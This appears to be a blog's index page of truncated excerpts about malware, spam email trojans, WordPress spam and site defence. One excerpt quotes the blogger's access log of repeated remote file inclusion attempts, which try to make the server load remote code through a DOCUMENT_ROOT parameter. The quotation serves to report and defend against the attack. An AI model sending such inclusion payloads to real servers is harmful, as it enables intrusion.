Strangely Perfect

Remove Referrals Information from This Website because of Malware Like many blogs, this website has displayed the last few hits (referrals) that it’s received as a kind of ‘live’ activity recorder and a small service back to the referring website.  However, I’ve had to pull this from my front page because over the last few [...]

Windows 7 Ultimate Install To say that I’m seriously impressed is an understatement! Having an MSDN subscription confers certain benefits, but for most Microsoft stuff that I have to use, it’s usually an exercise in teeth-gritting somewhere from the banal to the infuriating as I plod on through. My personal experience of Vista comes into [...]

Introduction I had an interesting referral from an external website early today.  It was, http://kexhoxonxk.iblogger.org/ iblogger.com has a decent WHOIS entry and is USA based.  However, the sub-domain bit is a bit iffy. MyBookFace.net If you follow the link, it’s immediately redirected to http://mybookface.net/ The tagline for this website is: MyBookFace is a friendly social [...]

Multiple Attempts to Drop Trojan on This Website Failed These are the Wassup details of the attack 69.65.41.165 2009-06-13 10:48:00 //?_SERVER[DOCUMENT_ROOT]=http://ww(…)omponents/com_frontpage/test.txt?? Referrer: Direct hit Hostname: 69.65.41.165 User Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) OS: WinVista BROWSER: IE 7 10:33:14 ->//?_SERVER[DOCUMENT_ROOT]=http://www.fox(…)com/components/com_frontpage/test.txt?? 10:34:03 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt?? 10:34:30 ->/3099/google-treasure-chest-its-a-scam-a(…)com/components/com_frontpage/test.txt?? 10:37:43 ->/3099////?_SERVER[DOCUMENT_ROOT]=http://(…)com/components/com_frontpage/test.txt?? 10:37:46 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt?? 10:47:59 ->/3099////?_SERVER[DOCUMENT_ROOT]=http://(…)com/components/com_frontpage/test.txt?? 10:48:00 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt?? As [...]

WordPress User Registration Spam Last year I told how I tackled various sorts of spam hitting the website, in particular, in this post, User Registration Spam.  Even now, my main defence is SABRE, although I don’t use all the options.  This gives me the combination of flexibility, security and openness I require on this website.  [...]

Or How to Disable Autoruns – to Stop This Particular Infection Route This is a brief summary of what to do… Make sure you have a proper anti-virus program running NOD32 is a good one! AVG is too Kaspersky, Trend, CA are also good brands Make sure your anti-virus is current and updated.  Check like [...]

As part of my day job, I get a (extremely valuable, it must be said, for which I’m very grateful) MSDN subscription. Recently, I’ve had trouble with Visual Studio.  It used to be 2005 and is now 2008.  They use the Team Foundation Server Developer Edition.  So I decided to re-install….  oh, dear. After a [...]

Following on from my earlier experiment with “The Complainerator“, I got a very similar message from myself to myself  again…  It’s the address I used to dig into XIN NET, whose automated systems now seem to think I really, really need some drugs from a Canadian (United Kingdom for me) Pharmacy. This is the email [...]

Today I’ve found something new, for me at least!  I’ve prattled on about how good I think NOD32 is as a piece of anti-virus software; low system utilisation, fast, effective, accurate, unobtrusive except when it needs to be… It also has a pretty good introductory service as well, available here, say, on their UK website.  [...]

“NOD32 has pulled out another nasty from an email that arrived today on one of my spam honeypot addresses.  Unlike last time, this time the identical (to me) message contains a Worm instead of a Trojan as an attachment.  NOD32 identifies it as an exe file inside a zip file called “a variant of Win32/Nuwar [...]

I had an “interesting” bit of crap email this morning.  I’m not sure that thieving threatening bastard email counts as “spam”, so I’ll continue to call it crap. Basically, it’s a poorly spelled email that threatens me to stop downloading illegally copied copyright material from the web or else their “organisation”, ICS, will get me [...]

Google Security Spotlight: July Virus Attacks My last few posts discussing the recent viral and trojan email spam that I’ve been receiving co-inside neatly with the latest post on the Google Enterprise Blog. email-spam-trojans-hiding-on-websites-as-msnbc-breaking-news-items/ two-examples-of-a-moving-trend-in-wordpress-comment-spam/ However, my experience of warnings and security alerts from Secunia and ESET shows how fluid the virus maker’s “selling” activity [...]

My recent post email-spam-trojans-hiding-on-websites-as-msnbc-breaking-news-items led with the effect and infection method for the Win32/Agent.ETH trojan.  Well now they’ve changed their attack a bit but the Trojan is the same… :-? Now the emails have the following identifiers: From:     Top News Agency Subject:  Weekly top news The sequence of events shown at the beginning of the [...]

For the past few weeks I suppose everyone has had a bit of email spam with this in the “From” and “Subject”: msnbc.com: BREAKING NEWS: There then follows a sucker headline which is obviously pants.  They all have a spoofed link for http://breakingnews.msnbc.com which points to somewhere else, quite often a html document on the [...]